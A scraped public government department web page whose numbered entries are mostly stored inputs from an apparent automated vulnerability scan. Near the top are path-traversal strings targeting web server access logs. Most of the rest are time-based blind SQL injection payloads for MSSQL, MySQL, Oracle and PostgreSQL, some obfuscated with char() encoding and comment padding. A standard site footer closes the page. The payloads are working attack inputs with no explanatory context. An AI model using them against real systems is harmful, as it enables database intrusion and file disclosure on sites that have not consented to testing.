9836 Smith data:;base64,TlM3NzU0NTYxNDQ2NTc1
9837
9838
9839 Smith /../../../../../../../../../../var/log/apache2/access.log
9840 /../../../../../../../../../../etc/httpd/logs/access.log
9841 Smith /../../../../../../../../../../etc/httpd/logs/access.log
9842
9843
9844 Smith
9845 Smith
9846 Smith
9847 /../../../../../../../../../../var/log/nginx/access.log
9848 Smith
9849 Smith
9850
9851
9852
9853 Smith /../../../../../../../../../../var/log/nginx/access.log
9854 Smith
9855 Smith
9856 Smith
9857 /../../../../../../../../../../opt/lampp/logs/access_log
9858
9859
9860
9861
9862
9863 Smith /../../../../../../../../../../opt/lampp/logs/access_log
9864 Smith
9865 /../../../../../../../../../../var/log/lighttpd/access.log
9866
9867
9868
9869
9870
9871 Smith /../../../../../../../../../../var/log/lighttpd/access.log
9872 Smith
9873
9874
9875
9876 /../../../../../../../../../../AppServ/Apache24/logs/access.log
9877 Smith
9878
9879 Smith /../../../../../../../../../../AppServ/Apache24/logs/access.log
9880 Smith
9881 Smith
9882 Smith
9883 ../../../../../../../../../../xampp/apache/logs/access.log
9884
9885
9886
9887 /../../../../../../../../../../var/log/apache/access.log
9888 Smith
9889 Smith
9890
9891
9892
9893 Smith
9894 Smith
9895 Smith
9896
9897
9898 Smith
9899 Smith
9900 Smith
9901 Smith
9902 Smith
9903 ' WAITFOR DELAY '0:0:25'-- /* f9ca291c-d7b0-4524-9436-d2d23b310872 */
9904 Smith ' WAITFOR DELAY '0:0:25'-- /* d2c26d4e-aa05-4f4a-800b-ac883246c28b */
9905 1 WAITFOR DELAY '0:0:25'-- /* a794e088-3e04-4811-81b6-60214fdc6868 */
9906 Smith 1 WAITFOR DELAY '0:0:25'-- /* 5a8f2957-616b-477c-9896-0eeb9ddf2633 */
9907 WAITFOR DELAY '0:0:25'-- /* 5cea2104-d716-4dd2-80fd-fc02cd16643c */
9908 Smith WAITFOR DELAY '0:0:25'-- /* 6ad9ac41-5f9b-4618-83be-452776fdf164 */
9909 Smith WAITFOR DELAY '0:0:1'-- /* dac48588-c5c8-4d6e-a378-df3794cec964 */
9910 Smith WAITFOR DELAY '0:0:1'-- /* b4b250c9-f5f0-450f-814c-20f430a7296c */
9911 Smith WAITFOR DELAY '0:0:30'-- /* 67bb003e-0f68-4dc3-bb24-60fd3305c46f */
9912 Smith WAITFOR DELAY '0:0:30'-- /* 5f234a03-0a72-445a-83af-7206f03f98e3 */
9913 1) WAITFOR DELAY '0:0:1'-- /* 6a3491dd-3228-4464-8fea-8b2649504af0 */
9914 1) WAITFOR DELAY '0:0:1'-- /* 6773bca4-b4cc-4ebd-98f7-79bd384a9f3b */
9915 1) WAITFOR DELAY '0:0:30'-- /* f5301db1-b956-4832-bb7a-6cdba4070871 */
9916 1) WAITFOR DELAY '0:0:30'-- /* e5b6d9fa-d3f8-4887-a483-7b1cf1667985 */
9917 Smith 1) WAITFOR DELAY '0:0:25'-- /* a2421268-fcd9-4e3e-9c94-c104e3c24be5 */
9918 ') WAITFOR DELAY '0:0:25'-- /* 275ddef9-39ab-4bcb-8655-03fd4204fb39 */
9919 Smith ') WAITFOR DELAY '0:0:25'-- /* 473a67cc-3284-4cf2-b958-8b8f4f0448d1 */
9920 ')) WAITFOR DELAY '0:0:25'-- /* d8796409-54e0-4258-8528-a77bb50229d8 */
9921 Smith ')) WAITFOR DELAY '0:0:25'-- /* eea01ad9-0654-4f8a-9e2b-fe84d5451d67 */
9922 1)) WAITFOR DELAY '0:0:25'-- /* 2a702fe0-cec2-4495-bdfb-3b93eed923a8 */
9923 Smith 1)) WAITFOR DELAY '0:0:25'-- /* 871ff7d5-64c4-4d8f-97ce-e6e6a14a28cf */
9924 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 7ed4b5ef-9e1a-4ca3-a6f3-04288f64e4bc */
9925 Smith 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* a7794c73-853a-4e39-b3bb-f7e14ca24859 */
9926 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 560eb745-ac5d-429f-bc1a-f8c811c75e32 */
9927 Smith 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 5af554b8-0bc8-427d-8dd3-42931ce7fb8b */
9928 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 6b9997c3-4658-4f90-98be-e8067d192083 */
9929 Smith 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 1a4052fa-b1e7-47c6-b233-44c3c6285f23 */
9930 syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 7d46733f-fc78-4b94-8d57-2beba3997089 */
9931 syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49);WAITFOR/**/DELAY/**/@x-- /* 2aee2f93-f77f-4452-8cb3-38c3eab9141a */
9932 syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49);WAITFOR/**/DELAY/**/@x-- /* d75edc0a-6d5c-48cd-85bd-d1c437ef5120 */
9933 syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(51)+char(48);WAITFOR/**/DELAY/**/@x-- /* b3745d57-bb35-40b4-a486-26bb89c17414 */
9934 syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(51)+char(48);WAITFOR/**/DELAY/**/@x-- /* 058f8391-3741-43ee-af0a-593a8983e6f2 */
9935 Smith syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 014a5489-9d47-4990-8338-5b71c4c4d3cd */
9936 + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/ /* 84af306e-a8a1-4e82-8c39-e38f4a59c10a */
9937 + ((SELECT 1 FROM (SELECT SLEEP(1))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(1))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(1))A)))OR"*/ /* 1d13d7e5-37d9-4428-a30c-b5c50ce7db98 */
9938 + ((SELECT 1 FROM (SELECT SLEEP(1))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(1))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(1))A)))OR"*/ /* f3918dac-c7c1-4f29-89a3-794d198aba01 */
9939 + ((SELECT 1 FROM (SELECT SLEEP(30))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(30))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(30))A)))OR"*/ /* f17a096b-ff31-4aff-b2ae-aaf4962ce0df */
9940 + ((SELECT 1 FROM (SELECT SLEEP(30))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(30))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(30))A)))OR"*/ /* 61d15005-a3e3-4471-8a58-3e859cc6b79b */
9941 Smith + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/ /* 3d651ab6-d22a-40e0-9856-189e8505f1ae */
9942 -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1 /* f96e79f2-2c94-464c-9ba9-b96484f26584 */
9943 Smith -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1 /* 4704b3bf-4f09-4ce1-87a8-476819f36b06 */
9944 ((select sleep(25)))a-- 1 /* 5a1535b9-125c-4614-afa8-9c9234a20d03 */
9945 Smith ((select sleep(25)))a-- 1 /* 8efc0341-f969-4e0f-bed1-8723a34ccc16 */
9946 (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) /* f5619f5d-376a-4112-b546-89a4734e3eb3 */
9947 Smith (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) /* 0516ba72-b2d8-4c0c-805d-abe98c21557a */
9948 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || ' /* b0029bdd-51f1-471e-bd88-dc380237f4ad */
9949 Smith 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || ' /* 9c4f08b9-dc75-4efc-9feb-9fdd5cee6608 */
9950 1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1 /* b99534eb-96b1-41b8-a7a5-e19f8dddafd3 */
9951 Smith 1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1 /* 7e33bc35-2ee2-4b5d-8c3d-d3aa0cc10829 */
9952 ';SELECT pg_sleep(25)-- /* 23a08634-c67c-4699-a090-920d85d941f8 */
9953 Smith ';SELECT pg_sleep(25)-- /* afd0c3e6-1ff5-4359-996a-76c869c832b8 */
9954 ;SELECT pg_sleep(25)-- /* 8348a59e-493a-42e5-8a38-91fdeb002e8f */
9955 Smith ;SELECT pg_sleep(25)-- /* 7530f8d0-ca9a-4ef7-8060-31a574230041 */
9956 SELECT pg_sleep(25)-- /* 0e8c343d-0471-4ff7-b715-8204e79c0221 */
9957 Smith SELECT pg_sleep(25)-- /* 9cad46a8-2cfb-4616-8095-aa2007a74448 */
9958 );SELECT pg_sleep(25)-- /* dfc270c6-b8d9-4464-aaf5-4bf59a92c643 */
9959 Smith );SELECT pg_sleep(25)-- /* 82b44a77-4aa2-4227-bdac-8dfd0a194344 */
9960 ');SELECT pg_sleep(25)-- /* 4b675e2c-8b6f-4d81-9b61-a95d2524d8ca */
9961 Smith ');SELECT pg_sleep(25)-- /* e6246e14-8515-4bf0-835c-26753c3a880a */
9962 '));SELECT pg_sleep(25)-- /* 425b9df4-cc1b-41c8-9393-2910ec5d87f9 */
9963 Smith '));SELECT pg_sleep(25)-- /* f5c67dcb-0a10-4180-8e2d-05e29c74403b */
9964 ));SELECT pg_sleep(25)-- /* 994f373e-b791-4a6d-9e12-e81263be1f09 */
9965 Smith ));SELECT pg_sleep(25)-- /* d9adb31a-2728-447c-a179-93ef081f44c3 */
9966 ((SELECT(1)FROM(SELECT(SLEEP(25)))A)) /* a2a9244b-b93d-40b7-8fce-b36b5f1dd10e */
9967 Smith ((SELECT(1)FROM(SELECT(SLEEP(25)))A)) /* 78a33036-c6e1-4aee-880f-edb01db5bfdf */
9968 '+((SELECT 1 FROM (SELECT SLEEP(25))A))+' /* 3f7cc864-0ef2-47a6-852d-d22fb8df594a */
9969 Smith '+((SELECT 1 FROM (SELECT SLEEP(25))A))+' /* 0e8e85ed-fba2-4a5c-9b94-32c6bd09368e */
9970 -1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+' /* f8ed7da9-0b29-43d3-a759-c1d3261f56eb */
9971 Smith -1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+' /* 74adc7a2-a45d-4173-85a5-6dd641445311 */
9972 -1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A)) /* fbb480de-f542-47ea-9982-067822e4747d */
9973 Smith -1 or 1=((SELECT 1 FROM (SELECT SLEEP(1))A)) /* 4d974552-fdb2-4e77-af39-b8cd39fd0340 */
9974 Smith -1 or 1=((SELECT 1 FROM (SELECT SLEEP(1))A)) /* 81369357-98a6-4b9b-afe8-148df257c070 */
9975 Smith -1 or 1=((SELECT 1 FROM (SELECT SLEEP(30))A)) /* 3343f860-9cbf-4fed-9ae9-72e3de0a6aee */
9976 Smith -1 or 1=((SELECT 1 FROM (SELECT SLEEP(30))A)) /* 2f301d24-d630-4d36-82a3-2a2408537360 */
9977 -1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+" /* 61add164-d3fe-4eeb-8670-beca05661d40 */
9978 Smith -1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+" /* 015f6679-31b1-4890-aa65-0ac4bdabe82b */
9979 ') AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* fc424365-084c-46da-957e-703af2ecebf4 */
9980 Smith ') AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* b99a92e7-83b6-49bd-928d-ecbc6bd62515 */
9981 Smith ') AND (SELECT 1 FROM (SELECT(SLEEP(1)))A)-- 1 /* 7afe07b6-7d66-4244-be48-fe8431b4f54e */
9982 Smith ') AND (SELECT 1 FROM (SELECT(SLEEP(1)))A)-- 1 /* e5c0f179-02e1-44d3-b47a-0b9f1d35828f */
9983 Smith ') AND (SELECT 1 FROM (SELECT(SLEEP(30)))A)-- 1 /* 67dc991b-c08a-4b04-af67-05e9aad60138 */
9984 Smith ') AND (SELECT 1 FROM (SELECT(SLEEP(30)))A)-- 1 /* 85dd7905-b513-4acf-b5dc-4c916c279e81 */
9985 ' AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* 79ee7267-950f-4fd5-930c-daa48e174d27 */
9986 ' AND (SELECT 1 FROM (SELECT(SLEEP(1)))A)-- 1 /* e2b0fc51-76c9-4a4c-b259-53af5ffa166c */
9987 ' AND (SELECT 1 FROM (SELECT(SLEEP(1)))A)-- 1 /* 2a913a3b-7a0d-474e-8825-e4d10780e403 */
9988 ' AND (SELECT 1 FROM (SELECT(SLEEP(30)))A)-- 1 /* 37c98044-1b47-403d-a590-b4431ce63257 */
9989 ' AND (SELECT 1 FROM (SELECT(SLEEP(30)))A)-- 1 /* f043bbe1-8101-4bff-8096-0b5765fc6637 */
9990 Smith ' AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* f026795b-4881-4cf0-8b6c-9ab8ca3af3a6 */
9991 'XOR(if(now()=sysdate(),sleep(25),0))XOR'NS /* 991b1a80-4738-4988-866f-3862137de4be */
9992 Smith 'XOR(if(now()=sysdate(),sleep(25),0))XOR'NS /* 68e9e51a-0f7f-4010-b05c-9c486b98c576 */
9993
jmc
smc
digitaljk
eunnat
j&k
w3c

Disclaimer:

Copyright © All Rights Reserved 2023- Content on this website is published and managed by the Housing & Urban Development Department, UT Administration of Jammu & Kashmir, India

Best viewed in Mozilla Firefox, Google Chrome & Internet Explorer @ 1024 x 768 pixels. This site requires JavaScript.

gigw gigw

Last reviewed and updated on 02-Apr-2025 04:56 AM

No. of Visitors: 3703